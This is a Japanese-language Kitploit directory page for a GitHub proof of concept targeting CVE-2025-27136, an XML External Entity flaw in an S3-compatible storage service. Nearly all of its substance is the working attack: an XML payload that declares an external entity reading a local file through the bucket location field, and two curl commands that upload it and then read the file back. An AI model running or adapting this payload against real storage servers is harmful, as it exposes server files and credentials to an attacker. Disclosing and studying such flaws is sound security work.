Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/issaboudin/cve-2025-27136
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストクラウドセキュリティ
GitHubissaboudin/cve-2025-27136

CVE-2025-27136

S3におけるXML External Entity PoC.

リポジトリを見る
136ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-27136

XML External Entity(XXE)脆弱性の悪用

XMLペイロードを使用して機密ファイルを取得する(PoC)

test.xml

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///path/to/file">
]>
<CreateBucketConfiguration>
  <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

curlを使用して、ローカルマシンからバケットに test.xml をアップロードします。

root@kitploit:~
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml

エクスプロイトをトリガーしてファイルを取得する

root@kitploit:~
curl http://127.0.0.1:PORT/TB1?location
ツールをダウンロード